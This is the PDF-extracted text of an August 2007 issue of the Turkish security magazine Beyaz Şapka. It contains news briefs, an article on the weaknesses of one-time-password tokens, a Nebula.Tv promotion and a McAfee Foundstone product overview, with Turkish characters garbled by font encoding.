Agu`07 eskiz-6 - Nebula Bilişim

Transkript

Agu’07 eskiz-6 7/31/07 12:35 AM Page 1
B‹LG‹ GÜVENL‹⁄‹ PLATFORMU
KISA KISA KISA KISA KISA KISA KISA KISA KISA KISA
• Merakla beklenen 1. Türkiye BSD Konferans› 20-21 Ekim 2007
tarihinde Marmara Üniversitesi Göztepe kampüsünde yap›lacak.
Konferansa kat›l›m için doldurulmas› gereken form konferans›n
resmi web sitesinde bulunabilir. www.bsdcontr.org
• Forefront Client Security, West Coast Laboratuarlar› sertifikasyonundan sonra Virus Bulletin taraf›ndan verilen VB100 ödülünü
de ald›. Bu ödülü “in the wild” denilen yani güncel olan virüsleri
hatal› alarm üretmeden %100 baflar› ile yakalayan anti-virüs ürünleri
alabiliyor.
• Google masaüstü sistemler için kendi Linux da¤›t›m›n› ç›kartmaya
haz›rlan›yor. Bu çal›flma Microsoft'un masaüstündeki hâkimiyetini
sarsacak gibi gözüküyor. Google, Linux projesi üzerinde çal›flt›klar›n›
do¤rulad›. Ancak ayr›nt›lar ve projenin gelece¤i hakk›nda bilgi
vermedi.
• Microsoft, Forefront ailesinin yeni üyesini “Stirling” kod ad›yla
tan›tt›. Stirling ile de¤iflik teknolojilerin koordineli bir flekilde merkezi
olarak yönetimi ve raporlamas› yap›labilecek.
• IronKey flash bellek, “Görevimiz Tehlike” filmindeki gibi kendini
fiziksel flekilde (this tape will self-destruct in five seconds) imha
etmiyor. Ancak flifrenin 10 kere yanl›fl girilmesi halinde üzerindeki
bilgileri siliyor. Üst seviye AES donan›msal flifreleme tekni¤ini
kullanan üründe veriye ulaflmak için belirledi¤iniz flifreyi girmeniz
gerekiyor. E¤er flifre girerken 10 denemede baflar›s›z olunursa
IronKey üzerindeki bütün bilgiler flash-trash sistemiyle siliniyor ve
kurtar›lmas› da mümkün olmuyor.
• Microsoft'un Vista iflletim sistemini k›rmak için u¤raflan yaz›l›m
korsan gruplar›ndan NoPE, “Paradox OEM BIOS Emulation Toolkit”
arac› ile amac›na ulaflm›fl gözüküyor. Grubun gelifltirdi¤i bu özel
araç Windows Vista’ya lisans anahtar› girmeksizin k›rabiliyor ve tüm
güncellemeleri yapmas›na olanak sa¤l›yor.
• Pardus 2007 iflletim sisteminin güncellenmifl ara sürümü “Pardus
2007.2 Caracal caracal” yay›nland›. Pardus, kullan›c›lar›na en güncel
uygulamalar› ve en son güvenlik yamalar›n› da internet üzerinden
GNU GPL Genel Kamu Lisans› ile özgürce sa¤l›yor.
• Dinamik web sayfalar› oluflturmada kullan›lan programlama dili
PHP sürüm 4 yolun sonuna geliyor. Üç y›l önce PHP 5 sürümünün
ç›k›fl›yla bugüne kadar gelinen süreçte yap›lan iyilefltirmeler ve
gelifltirmeler PHP 4'ün pabucunu dama att›. PHP 5 flu an için h›zl›,
stabil ve üretime haz›r durumda. PHP 6 sürümünün de yolda oldu¤u
biliniyor. Bu y›l›n sonunda kadar sürecek PHP 4 deste¤i 31 Aral›k
2007'de sona erecek ve PHP 4.4'ün yeni sürümü ç›kmayacak. Ancak
08-08-2008 tarihine kadar her türlü güvenlik aç›¤› kapat›lmaya
devam edilecek. Programc›lar›n bu süre içerisinde kodlar›n› PHP 5
sürümüne uygun hale getirmeleri tavsiye ediliyor.
ANA SPONSORLARIMIZ
nebula
www.nebulabilisim.com.tr
www.microsoft.com.tr
KATILIMCI SPONSORLAR
‹LET‹fi‹M SPONSORU
INTERNET SPONSORU
Beyaz fiapka’ya katk›lar›ndan dolay› tüm sponsorlar›m›za ve yazarlar›m›za teflekkür ederiz.
Yay›nlanan yaz›lar›n tüm sorumlulu¤u yazarlar›na aittir. Lütfen her konuda fikrinizi yaz›n.
www.beyazsapka.org info@beyazsapka.org
Agu’07 eskiz-6 7/31/07 12:35 AM Page 2
Abonelik Sistemimiz De¤iflti!
‹mtiyaz Sahibi
Sinan YILMAZ
De¤erli Okurumuz,
Sorumlu Müdür
Erkan fiEN
Hat›rlayaca¤›n›zgibi abonelik sistemimizde köklü bir de¤ifliklik yapt›¤›m›z› duyurmufltuk.
Amac›m›z Beyaz fiapka’y› bilgi güvenli¤i ile ilgilenen 3.000 aboneye ulaflt›rmak.
De¤ifliklik sürecimiz tamamland›. 28 May›s 2007 tarihi itibar› ile baflvuru formumuzdan
"eski abone" seçene¤ini kald›rd›k. Bu tarihten itibaren yap›lacak tüm abonelik
baflvurular› yeni abone ifllemine tabi tutulacakt›r. Yeni sistemde abone kayd›
bulunmayan okurlar›m›z maalesef Beyaz fiapka’y› temin edemeyecekler.
Yay›n Dan›flman›
Mehmet Ersin DA⁄LI
Yay›n Kurulu
Caner DA⁄LI, Erkan fiEN, Seçkin DEM‹R
Serkan AKCAN, Sinan YILMAZ
Editör
Eren ÇINAR, TAMKADRO
Grafik Tasar›m ve Uygulama
TAMKADRO
‹dari ‹fller Koordinatörü
Sinan YILMAZ
Bu Say›ya Katk›da Bulunanlar
Afflin TAfiKIRAN, Coflkun KAM‹LO⁄LU,
Erkan fiEN, Dr. Leyla Keser BERBER,
Luc Erol ALPTUNA, Mehmet ÜNER,
Murat LOSTAR, Nil ALTINUS,
Serkan AKCAN, Sinan YILMAZ,
fierif TEKDAL, Umut ‹NETAfi
Yönetim Yeri
Mecidiyeköy ‹fl Merkezi fiehit Ahmet Sokak
No: 4 Kat: 12 D: 121 Mecidiyeköy / ‹stanbul
www.beyazsapka.org
info@beyazsapka.org
Bask›
X-PRESS BASKI A.fi.
Tel: (212) 282 52 00
Nato Caddesi No: 17 Seyrantepe / ‹stanbul
Ana Sponsorlar
nebula
1.Web sitemizden kullan›c› ad› ve flifre ald›n›z m›?
Henüz bir kullan›c› ad› ve flifreniz yoksa hemen web sitemizde bulunan formu
doldurabilirsiniz. Daha önce bir hesap aç›p flifrenizi unuttuysan›z “fiifremi Unuttum”
seçene¤ini kullanabilirsiniz. E¤er kullan›c› ad› ve flifreniz ile web sitemize girifl
yapabiliyorsan›z temel kay›t ifllemlerinizi tamamlam›fls›n›z demektir.
Kullan›c› ad› ve flifre sorunlar›n›z› yönetim ekibimize iletebilirsiniz.
2.Posta adresinizi kontrol ettiniz mi?
Beyaz fiapka, abonelik profilinizde belirtti¤iniz posta adresine otomatik olarak
gönderilir. Bilgilerinizin do¤rulu¤unu tekrar kontrol etmenizi öneriyoruz. Profil
bilgilerinizi web sitemize girifl yaparak görebilir ve de¤ifltirebilirsiniz.
Beyaz fiapka Yönetimi
info@beyazsapka.org
‹çindekiler
04 >> Kimlik Do¤rulama
Hiç flüphe yok ki bilgi güvenli¤inde yat›r›m geri dönüflü
en h›zl› olan teknolojilerin bafl›nda kimlik do¤rulama
ürünleri bulunuyor. Bilgi güvenli¤inin bu önemli
oyuncusu hakk›nda bilgilerimizi tazeleyelim.
Serkan AKCAN - Nebula Biliflim
18 >> Fazla Güvenlik Göz mü Ç›kar›r?
Uzmanlar hakl› olmal›…
Luc Erol ALPTUNA – Trend Micro
20 >> Aç›k Kodlu Güvenlik Duvarlar›
A¤›n›z› aç›k kodlu güvenlik duvarlar›yla koruyun
Afflin TAfiKIRAN – Ford Otosan
06 >> Nebula.Tv
Türkiye’nin ‹lk ve Tek Bilgi Güvenli¤i Televizyonu
Kat›l›mc› Sponsorlar
‹letiflim Sponsoru
Aboneli¤inizi iki ad›mda kolayca do¤rulayabilirsiniz.
Internet Sponsoru
Tasar›m
www.tamkadro.com.tr
Sinan YILMAZ – Nebula Biliflim
22 >> Microsoft Network Access Protection (NAP)
Microsoft’un güvenlik için en yeni hamlesi
Umut ‹NETAfi - Intertech
07 >> McAfee Foundstone ile Risk Yönetimi
Sahip oldu¤unuz varl›klar›n risk analizini yap›yor ve
yönetebiliyor musunuz? Otomatik ve merkezi risk
yönetiminin en kolay yolunu ö¤renin.
24 >> JavaScript Hijacking
Uygulaman›z veri aktar›m› için JavaScript
kullan›yorsa, bu aç›¤a dikkat!
Coflkun KAM‹LO⁄LU - McAfee
fierif TEKDAL – Red Biliflim
10 >> Art›k Kontrol Sizde
Microsoft’un Güvenlik Ailesi Forefront ve Yönetim
Ailesi System Center ile kurumlar, bilgi teknoloji
altyap›lar› üzerinde tam bir kontrole sahip olabilirler.
26 >> Trustmark
e-Ticarette tüketici güvenini kazanman›n en kolay
yolu
Dr. Leyla Keser BERBER – ‹stanbul Bilgi Üniversitesi
Mehmet ÜNER - Microsoft
Beyaz fiapka,
ücretsiz olarak abonelerine da¤›t›l›r.
Marka ba¤›ms›zd›r, sayfalar›
okuyucular›na aç›kt›r.
Bilgiye yöneliktir ve bilgi güvenli¤ine
önem veren sponsorlar›n›n katk›s› ile
okuyucular›na ulafl›r.
Üç ayda bir yay›nlan›r.
Nebula Biliflim Sistemleri San. ve Tic. Ltd. fiti.
taraf›ndan ücretsiz da¤›t›l›r.
14 >> Sidewinder® Network Gateway Security
Firewall’unuz daha fazla güvenlik sa¤layabilir.
Sektörünen güçlü firewall üreticisinden daha fazla
tehditi nas›l durdurabilece¤inizi ö¤renin.
Nil ALTINUS - Aptec
16 >> Underground
Web uygulamalar›n›z›n güvenli¤inden flüpheniz mi
var? Web güvenli¤ini test eden ücretsiz yaz›l›mlardan
haberdar olun.
28 >> Bilgi Güvenli¤i’nin Organizasyonu ve
Koordinasyonu
Bilgi Güvenli¤i Yönetim Sistemi (BGYS), bilgi
güvenli¤ini sürekli k›lmay› ve geliflmeyi hedefler. Bu
amaçla hem kurum içinde bilgi güvenli¤ini yönetmek,
hem de kurum d›fl›ndaki uzmanlarla yak›n iliflkiler
kurmak gerekir. Ama nas›l?
Murat LOSTAR - Lostar Bilgi Güvenli¤i
Erkan fiEN – Nebula Biliflim
A¤ustos 2007 beyazflapka 03
Nebula Bilişim’in katkılarıyla yayımlanmıştır.
Agu’07 eskiz-6 7/31/07 12:35 AM Page 3
Serkan AKCAN
serkan.akcan@nebulabilisim.com.tr
Kimlik Do¤rulama
kimlik denetimini meflhur yöntemimizle güçlendirmifl oluruz:
Sahip olunan bir fley, bilinen bir fley...
a2. Time-Synchronous (Zaman Senkronizasyonu)
Bu say›da tek kullan›ml›k flifre üreten teknolojiler hakk›nda bilgi
aktaraca¤›m. Birço¤umuz merak ediyor, birço¤umuz kullan›yor
ama teknolojisini tan›m›yor. Üstelik baz›lar› ciddi riskler bar›nd›r›yor.
Hemen konuya geçelim. Biliyorsunuz bu teknoloji kullan›c›ya
verilmifl bir “token” ile çal›fl›yor. Önce token tiplerine bakal›m:
de olsa sadece flifre üretmek için kullan›lan bir donan›m tafl›ma
zorunluluklar›n›n ortadan kalkmas›d›r.
Yaz›l›m token’lar› birçok ortamda çal›flmaktad›r. Microsoft
Windows iflletim sistemlerinde, Windows Mobile/Palm avuç içi
bilgisayarlarda, Symbian gibi cep telefonu iflletim sistemlerinde,
Java taban›yla hemen hemen her marka cep telefonunda yaz›l›m
çal›flt›rmak mümkündür. Hatta GSM flebekelerinin k›sa mesaj
servisleri ile entegre olup, kullan›lacak flifreyi SMS ile gönderen
ürünler bile mevcut.
Zaman senkronizasyonu çok daha basit bir algoritmaya sahiptir.
Zaman senkronizasyonu tekni¤i ile çal›flan token donan›mlar›n›n
büyük ço¤unlu¤unda, flifre ekranda sürekli gösterilir. Bu cihazlar
otuz saniye ile bir dakika aras›nda flifreleri de¤ifltirirler. Ancak
oldukça önemli bir dezavantajlar› bulunur. fiifre süresi dolmad›¤›
sürece flifreler tekrar tekrar kullan›labilir. Örne¤in internet
bankac›l›¤›na zaman senkronizasyonu ile çal›flan token cihaz›n›
kullanarak girifl yapt›n›z ve a¤ seviyesinde flifreniz çal›nd›.
fiifrenin maksimum bir dakikal›k ömrü dolmadan bu flifre tekrar
kullan›l›rsa sistem eriflime izin verecektir.
okundu¤unda sanki zaman senkronizasyonu çok eski bir
teknolojiymifl gibi alg›lan›yor ama birçok token ürünü hala bu
sistemi kullan›yor. Hatta birçok banka bu sistemle çal›flan token
ürünleri da¤›t›yor.
B) Asenkron Eflleflme
Asenkron tekni¤i tamam›yla daha farkl›, çok daha güvenilir bir
sistemdir. Temelde challenge-response dedi¤imiz mekanizma
ile çal›fl›r.
Bu sistemde pin kodu olmadan flifre üretmek mümkün de¤ildir.
Ancak senkron sistemde oldu¤u gibi pin kodu kullan›c› taraf›ndan
belirlenmez. Do¤rulama yapacak sistem her kullan›mda
kullan›c›ya de¤iflik bir pin kodu üretir. Kullan›c› bu pin kodunu
token cihaz›na girer ve tek kullan›ml›k flifre üretilir.
Her do¤rulama iflleminde sistem farkl› bir pin üretti¤i ve bu pin’i
token cihaz›na girmemizi bekledi¤i için, bir flifre birden fazla
kez kullan›lamaz. Asenkron sistemlerde her kimlik do¤rulama
ifllemi s›ras›nda yeni bir pin yaratmak, dinamik trafik
flifrelemesine de imkân sa¤lar. Böylece flifrenin çal›nma riski
de azalt›lm›fl olur. K›sacas› Asenkron eflleflme sistemi, güvenlik
bak›m›ndan senkron sistemlere göre çok daha güçlüdür.
Çal›flma ortamlar› baflka olsa da token’lar sabit bir algoritmaya
sahiptir ve tüm çal›flma sistemi bu algoritman›n üzerine kuruludur. Temel olarak kullan›lan tekni¤i senkron ve asenkron
olarak ikiye ayr›labilir.
Donan›m Token
Bu büyük güvenlik avantaj›na ra¤men Asenkron tekni¤inin iki
önemli dezavantaj› bulunuyor. ‹lki elbette kullan›c›lar›n sistem
hakk›nda e¤itimi ve kullan›m zorlu¤u. ‹kincisi ise 3. parti
sistemlerle uyumlulu¤u. Asenkron eflleflme sisteminde net
standartlar bulunmad›¤›ndan her bir uygulama için yaz›l›m
gelifltirmek zorunda kalabilirsiniz. 3. parti sistemler (VPN,
Firewall, Radius vb.) genellikle Asenkron eflleflme sistemini
desteklemezler.
A) Senkron Eflleflme
Küçük bir donan›m›n içine gömülmüfl matematik algoritmas› ile
flifre üretir. Kulland›¤› tek kullan›ml›k flifre üretme tekni¤ine
ba¤l› olarak sadece tek bir tufla sahip olabilir, flifreyi sürekli
ekran›nda gösteriyor olabilir veya önceden belirlenmifl bir pin
ile flifre üretmek için kullan›lan numerik tufl tak›m›na sahip
olabilir. Teknolojisine ba¤l› olarak baz› ürünler kulland›klar› pilin
ömrü bitince çal›flmaz hale gelir. Baz› ürünlerde ise pil de¤ifltirmek mümkündür. Özellikle flifreyi devaml› ekranda gösteren
modellerin sürekli pil tüketti¤ini unutmamak gerekir.
Son zamanlarda programlanabilir token cihazlar› da üretilmeye
baflland›. ‹sterseniz siparifl esnas›nda özel olarak programlatabiliyorsunuz, isterseniz numerik tufl tak›m›n› kullanarak token’›
bafltan tan›mlayabiliyorsunuz. Bu programlanabilir token
cihazlar›n›n en önemli avantaj› flu ki, token sisteminin matematik
algoritmas›n› istedi¤iniz gibi de¤ifltirebiliyorsunuz. Yani sistemin
kullanaca¤› teknolojiyi seçme özgürlü¤üne art›k sahibiz.
Donan›m token’lar›n›n en büyük dezavantaj› kaybedilme/çal›nma
riskleridir. Ancak üreticiler baz› önlemler gelifltirerek bu riski
s›f›rlayabilir.
Yaz›l›m Token
Donan›m token cihaz›n›n yapt›¤› iflin ayn›s›n› yapan yaz›l›mlar
bulunmaktad›r. Elbette en önemli avantaj›, kullan›c›lar›n küçük
Kullan›m› en kolay olan grup senkron (eflzamanl›) token’lard›r.
Tekni¤i kendi içinde ikiye ayr›l›r:
a1. Event-Synchronous
(Olay Senkronizasyonu)
Olay senkronizasyonuna sahip token’lar›n dü¤mesine basmak,
flifre üretimi için yeterlidir. Sunucu yaz›l›m› üretilen flifreleri
belirli say›larda akl›nda tutar. fiifre kullan›ld›¤›nda ise senkronizasyon otomatik olarak yap›lm›fl olur. Bu de¤erli bir bilgidir.
Nitekim zaman senkronizasyonu ile çal›flan sistemlerde bazen
elle senkronizasyon yapmak zorunda kal›n›r.
Olay senkronizasyonu tekni¤inin en büyük avantaj› flifrenin
sadece bir defaya mahsus kullan›labilir olmas›d›r. fiifre üretilip
kullan›ld›ktan sonra sistem otomatik olarak kullan›lan flifrenin
tekrar tekrar kullan›lmas›n› engeller. Özellikle internet bankac›l›¤›
gibi kritik sistemlerde ideal bir çözüm olabilir. Nitekim kullan›lan
flifre a¤ seviyesinde çal›nsa bile, tekrar kullan›m› asla mümkün
de¤ildir. Bu nedenle zaman senkronizasyonuna oranla çok daha
güvenilir bir sistemdir.
Olay senkronizasyonunda oldu¤u gibi, bu sistemde de sadece
kullan›c›n›n bildi¤i bir kodu flifreye eklemek mümkün. Ancak
flifreniz çal›n›rsa hem token taraf›ndan üretilmifl flifre, hem de
kullan›c›n›n kodu çal›nm›fl oluyor ve bu flifreler maalesef flifrenin
ömrü süresince tekrar tekrar kullan›labiliyor.
Güvenlik seviyesini art›rmak için, token taraf›ndan üretilen flifreye kullan›c› kendi belirledi¤i sabit bir kodu ekleyebilir. Böylece
Bu yaz›y› yazmama neden olan fley, zaman senkronizasyonu
kullanan müflteri say›s›n›n flafl›rt›c› derecede fazla olmas›. Yaz›
Kimlik Do¤rulama
04 beyazflapka A¤ustos 2007
Özet
Tek kullan›ml›k flifre üreten bir sisteme sahip olmak güvende
olmak anlam›na gelmez. E¤er bir kimlik do¤rulama sistemine
sahipseniz, kulland›¤›n›z teknolojiyi yak›ndan tan›y›p zaaflar›n›z›
fark etmeye çal›flmal›s›n›z. Bir kimlik do¤rulama sistemine
geçecekseniz, mutlaka güvenlik dan›flman›n›za baflvurun. Bu
sayfada tek kullan›ml›k flifre üreten kimlik denetim sistemleri
hakk›nda bilgi vermeye çal›flt›m. Ancak çok çeflitli yöntemlerle
(biometric, ak›ll› kart, dijital sertifika, vb.) kimlik denetimi
yap›labilir.
Umar›m bu makale, bir kimlik do¤rulama sistemine sahip olman›n
flifre güvenli¤ini %100 sa¤lamayaca¤›n› anlatmama yard›mc›
olmufltur.
Güvenli günler...
Kimlik Do¤rulama
Agu’07 eskiz-6 7/31/07 12:35 AM Page 4
Nebula.Tv
Sinan YILMAZ
sinan.yilmaz@nebulabilisim.com.tr
Nebula Biliflim olarak Nebula.Tv projesini hayata geçiriyor
ve Türk Biliflim sektörünün kullan›m›na sunuyor olmaktan
onur duyuyoruz.
Ancak her projemizde oldu¤u gibi, Nebula.Tv’nin yol haritas›n›
sizlerin geri bildirimleri çizecek. Fikirleriniz bizim için de¤erli,
lütfen bizimle paylafl›n.
Nebula.Tv içeri¤i sadece bilgi
güvenli¤inden oluflan Türkiye’nin
ilk ve tek ‹nternet televizyonu.
Asl›nda yapt›¤›m›z araflt›rmalarda
dünyada bilgi güvenli¤i konusunda
yay›n yapan baflka bir televizyon
kanal›na rastlayamad›k. “Nebula
Yard›m Masas›” ve flu an okumakta oldu¤unuz “Beyaz fiapka” gibi
birbirinden önemli projeleri
yaratarak, Türk Biliflim sektöründe
ilklere imza atan ekibimiz; Nebula.Tv projesi ile sadece
Türkiye’de de¤il, dünyada bir ilki gerçeklefltirdi.
2. Kimler Video Yay›nlayabilir?
Televizyonumuz Nebula Biliflim markas›yla hizmet verecek
ve Nebula Biliflim taraf›ndan yönetilecek. D›flar›dan video
yüklenmesi güvenlik gere¤i mümkün olmayacak. Ancak aç›k
fikirli politikam›z› internet televizyonumuzda da devam
ettirece¤iz. Yani ba¤›ms›z kifli veya kurumlar›n bilgi güvenli¤i
çal›flmalar›n› da Nebula.Tv’de yay›nlayaca¤›z. Video yay›nlamak isteyen Beyaz fiapka okurlar› bizimle temasa geçebilirler.
Hizmet konusunda her zaman bir ad›m önde olaca¤›m›z›
taahhüt ederek bafllad›¤›m›z yolculu¤umuzda, desteklerini
esirgemeyerek hizmet kalitemizi art›rmam›za imkân sa¤layan tüm müflterilerimize ve Beyaz fiapka okurlar›na;
projelerimize destekleri ile de¤er katan
Juniper Türkiye, McAfee Türkiye,
Microsoft Türkiye, Red Biliflim, Secure
Computing ve TrendMicro Türkiye’ye
teflekkürlerimizi sunar›z.
3. Eriflim
Nebula.Tv sadece kurumsal müflterilere hizmet vermek üzere
tasarland›. ‹çeri¤inde bulunan hack demolar›n›n kötü amaçl›
kullan›ma neden olmamas› için sadece kay›tl› kullan›c›lara
hizmet veriyoruz. Abone olmaks›z›n video izlemek mümkün
olmayacak.
4. ‹letiflim Entegrasyonu
Kay›t b›rakarak Nebula.Ty’ye
abone olanlar için ‹letiflim
Entegrasyonu projemizi de hayata geçiriyoruz. Abonelerimize
kay›t s›ras›nda bildirdikleri
veriler ›fl›¤›nda düzenli bilgilendirmeler yapaca¤›z. E-bülten entegre bu projemiz, abonelerimizin kullanmakta oldu¤u veya
ilgilendi¤i ürünlerin yeni versiyonlar›; yamalar›, güvenlik zaaflar›, rakip ürün karfl›laflt›rmalar›
veya kampanyalar› hakk›nda
önemli bilgileri iletecek.
www.nebulabilisim.tv adresinden
sadece kurumsal bilgi güvenli¤i
konusunda yay›n yapacak olan ‹nternet televizyonumuzu dört ad›mda k›saca aç›klamaya çal›flaca¤›m.
1. Nebula.Tv ‹çeri¤i
Televizyonumuzun içeri¤inin ana bafll›klar›n› belirledik.
- Hacking Demolar›
- S›n›r Güvenli¤i
- Anti-Malware
- A¤ Güvenli¤i
- Sunucu ve ‹stemci Güvenli¤i
- Veri Güvenli¤i
- Güvenlik Yönetimi
- Di¤er (sektörel seminer ve organizasyonlar)
1 A¤ustos 2007 tarihi itibar› ile Nebula.Tv’ye ücretsiz abone
olabilir ve sizler için haz›rlad›¤›m›z videolar› izleyebilirsiniz.
Sizlere daha iyi hizmet üretmemiz için lütfen projemiz
hakk›ndaki fikirlerinizi bizimle paylafl›n.
Hemen flimdi abone olun!
www.nebulabilisim.tv
Nebula.Tv
McAfee Foundstone ile
Risk Yönetimi
Coflkun KAM‹LO⁄LU
coskun_kamiloglu@mcafee.com
Genel hatlar› ile Risk Yönetimi, firma varl›klar›n›n sahip
olduklar› risklerin belirlenmesi ve bu risklerin indirgenebilecek
en alt seviyede tutulmas› olarak tan›mlanabilir. Sahip olunan
risklerin belirlenmesinden sonra firmalar bu riskleri kabul
edebilir, baflka bir firmaya aktarabilir veya risklerin en aza
indirgenmesi için gerekli çal›flmay› kendisi yapabilir. Risklerin
do¤ru tespit edilebilmesi ifl süreklili¤i aç›s›ndan son derece
önemlidir. ‹nternet’e aç›k bir web sunucusunun sahip oldu¤u
risk de¤eri ile bir yaz›c›n›n sahip olmas› gereken de¤er birbirinden oldukça farkl›d›r.
McAfee Foundstone varl›klar›n belirlenmesi
ve bu varl›klar›n sahip olabilecekleri
güvenlik aç›klar›n›n tespitinde,
varl›klara risklerin atanmas› aflamas›nda oldukça kolayl›k
sa¤layan güvenlik risk
yönetimi ürünüdür. McAfee
bu konuda donan›m ve
yaz›l›m olarak iki ayr›
çözüm sunabilmektedir.
Donan›m taraf›nda iki
farkl› ürün mevcuttur:
• FS1000, iflletim
sistemi, veritaban› ve
Foundstone Enterprise
yaz›l›m›n beraber geldi¤i bu
ürün, bir Foundstone sisteminin ana eleman›d›r. Cihaz
üzerinde iki adet ethernet arabirimi bulundu¤u için farkl› 2 segmentte tarama yapabilmektedir.
• FS850, tarama motoru olarak da adland›r›labilen bu ürün, WAN hatlar› üzerinden tarama yapmak yerine
uzak noktalar›n lokal a¤lar›na konumland›r›labilen ve
taramalar› lokal olarak yap›p ald›¤› bilgileri FS1000 sistemine
gönderebilen üründür. Üzerinde dört adet ethernet arabirimi
bulunmaktad›r ve dört farkl› segmentte tarama yapabilmektedir. FS850 kullan›labilmesi için ortamda bir adet FS1000
bulunmas› gerekmektedir.
Donan›m çözümü haricinde istenirse, Foundstone sadece
yaz›l›m olarak sat›n al›nabilir ve mevcut bir iflletim sistemi
ile veritaban› ortam›na entegre edilebilir.
Foundstone varl›klar›n belirlenmesinde önemli bir rol
oynamaktad›r ve bu varl›klar›n tespitinde birden çok metot
kullanabilmektedir. TCP, UDP ve ICMP tarama metotlar›n›
kullanarak varl›k tespiti yapabilmektedir. Bunun haricinde
bu varl›klar› ePO (Event Policy Orchestrator) veritaban›ndan
alabilmektedir. ePO önceki yaz›lar›m›zda detayl› bahsetti¤imiz
McAfee yönetim yaz›l›m›d›r. Bu entegrasyon,
halihaz›rda varolan bir ePO veritaban›ndan
tüm varl›klar›n al›n›p Foundstone veritaban›na kaydedilmesini mümkün
k›lmaktad›r. Bu varl›klar istenildi¤i
flekilde gruplanabilir ve her bir
varl›k için farkl› bir risk de¤eri
atanabilir.
McAfee
Foundstone afla¤›daki birimlerden oluflur:
FoundScan: Tarama ifllemlerini yapan bu birim farkl›
noktalara kurulabilir. 20
farkl› uzak nokta varsa 20
farkl› Foundscan kurulabilir ve bunlar›n yönetimi tek
bir merkezden yap›labilir.
Tarama ifllemlerine bafllad›klar› zaman veritaban›ndan
ilgili denetim imzalar›n› al›rlar ve
tarama ifllemi sonuçlar›n› yine ilgili
veritaban›na gönderirler.
Foundstone Enterprise Yönetim Arabirimi:
Foundstone sisteminde sadece bir adet bulunan bu arabirim
tüm tarama ifllemlerinin yarat›lmas› ve yönetilmesi, rapor
al›nmas›; otomatik rapor gönderimi, kullan›c› tan›mlamalar›,
varl›k yönetimi ve benzeri ifllemlerin yap›labildi¤i web
portal›d›r.
Foundstone Remediation Modülü: Tarama sonucunda
bulunan güvenlik aç›klar›n›n manuel veya otomatik olarak
McAfee Foundstone ile Risk Yönetimi
Agu’07 eskiz-6 7/31/07 12:35 AM Page 5
kiflilere atanmas›na olanak tan›r. Örne¤in Unix ile ilgili aç›klar›n X kullan›c›s›na atanmas› veya risk seviyesi high konumunda olan tüm aç›klar›n Y kiflisine atanmas› gibi ifllemler
bu modül taraf›ndan yürütülür. Her bir aç›k için farkl› bir ticket ifllemi yap›l›r ve kullan›c›lar web portaline erifltikleri za-
Foundstone Update: Sald›r› imza veritaban›n›n otomatik
olarak güncellenmesi haricinde FS1000 ve FS850 sistemlerinin iflletim sistemi ve veritaban› ile ilgili güvenlik güncellemeleri de yine bu modül taraf›ndan sa¤lan›r.
Oldukça geliflmifl bir raporlama arayüzüne sahip olan
Foundstone yaz›l›m›, farkl› formatlarda ve içerikte raporlar
üretebilir. Tarama sonunda istenirse farkl› kullan›c›lara bu
Her bir tarama sonucunda yap›lan hesaplamalar ile taramaya
0-100 aras›nda bir risk seviyesi verilir, bu bilgi veritaban›nda
saklan›r. Y›ll›k veya ayl›k bazda bu say›lar kullan›larak sistemlerin risk seviyesinin durumu k›sa veya uzun dönemli olarak
gözlemlenebilir.
Threat Correlation Module: Güvenlik
aç›klar›n›n hangi varl›k için kritik
oldu¤unun tespitinde kullan›lan
modüldür. Tüm güvenlik aç›klar› tüm
varl›klar için risk teflkil etmeyebilir
veya oldukça basit görülebilen güvenlik aç›klar› yüksek bir risk derecesi
bar›nd›rabilir. Bu tip durumlarda güvenlik aç›klar›n›n hangi varl›k üzerinde
nas›l bir risk teflkil etti¤inin kolayl›kla
incelenme-sine olanak tan›r.
Sald›r› veritaban›nda flu an itibariyle yaklafl›k 5400 imza bulunmaktad›r. Yöneticiler isterlerse FSL (Foundstone Scripting
Language) dilini kullanarak kendi sald›r› imzalar›n› yazabilirler
ve bu imzay› Foundstone imza veritaban›na ekleyebilirler.
McAfee Foundstone yaz›l›m› McAfee Preventsys ve McAfee
Remediation Manager ürünleri ile de entegre edilebilir.
Preventsys McAfee risk analiz yaz›l›m›d›r ve Foundstone’dan
ald›¤› bilgilerin analizleri neticesinde sistemdeki varl›klar›n,
ilgili uygunluk standard›na uyumlulu¤unun raporunu
ç›karabilir. Endüstri standard› uyumluluklar› desteklendi¤i
gibi firmalar Preventsys kullanarak kendi uygunluk standartlar›n› oluflturabilir ve varl›klar›n buna uyumlulu¤unu da denetleyebilirler. McAfee Remediation Manager yaz›l›m›
Foundstone’dan ald›¤› güvenlik aç›klar› raporlar›n› kullanarak
ilgili sistemlerin yamalar›n› download edebilir ve bunlar›
yönetici onay› ile ilgili sistemlere yükleyebilir.
Enhanced Reporting Modüle: Trend
raporlar›n›n al›nmas›nda veya spesifik
varl›klar için detayl› raporlar ç›kar›lmas› görevlerini üstelenen modüldür.
man kendilerine atanan ticket’lar› görebilirler.
Foundstone Notification Modülü: Farkl› noktalara kurulabilen
bu modül e-posta ve SNMP trap gönderimi ile al›nmas› görevlerini üstlenir. Remediation modülde anlat›lan tüm özellikler
farkl› bir ticket sistemine entegre edilmek istenirse, 2 yollu
SNMP metotu ile yap›labilir ve halihaz›rda kullan›lan ticket
sistemleriyle Foundstone’a entegre edilebilir. Tarama ifllemlerinin bafllamas›, bitmesi gibi durumlar›n kullan›c›lar taraf›ndan
haber al›nmas› istenirse e-posta uyar› sistemi kullan›labilir.
McAfee Foundstone sistem yöneticilerinin kullanabilece¤i haz›r tarama
flablonlar› sunmaktad›r. PCI, FISMA,
HIPAA ve ISO 27001 gibi uygunluk
denetimleri için özel haz›rlanm›fl
flablonlar kullan›labilir veya istenirse
farkl› flablonlar oluflturulabilir. Her
tarama ifllemi oldukça detayland›r›labilir. Taranacak sistemin ne tip
bir iflletim sistemi oldu¤u, sistem
üzerinde aç›k bulunan port ve servisler
uzak tarama ile denetlenebilir.
Microsoft Active Directory yap›s›nda
veya Unix Shell ortam›nda gerekli
yönetici kullan›c› ad› ve parolas›
verildi¤inde, sistemlere uzak eriflim
yapabilir ve daha detayl› bir tarama
ifllemi gerçeklefltirebilir. Web
sunucular›n taranmas› iflleminde source code disclosure,
source sifting, web authentication analyse gibi metodlar
kullanarak web uygulamalar›n›n güvenlik testlerini yapabilir. Haz›rlanan flablonlar sadece ne tip tarama yap›laca¤›
bilgisini de¤il, yap›lan tarama sonucunda ne tip bir rapor
haz›rlanaca¤› (HTML, PDF, CSV veya XML), bu raporun
kimlere gönderilece¤i, yarat›lan taraman›n hangi zamanlarda
hangi sistemler üzerinde yap›laca¤› bilgisini de içerir.
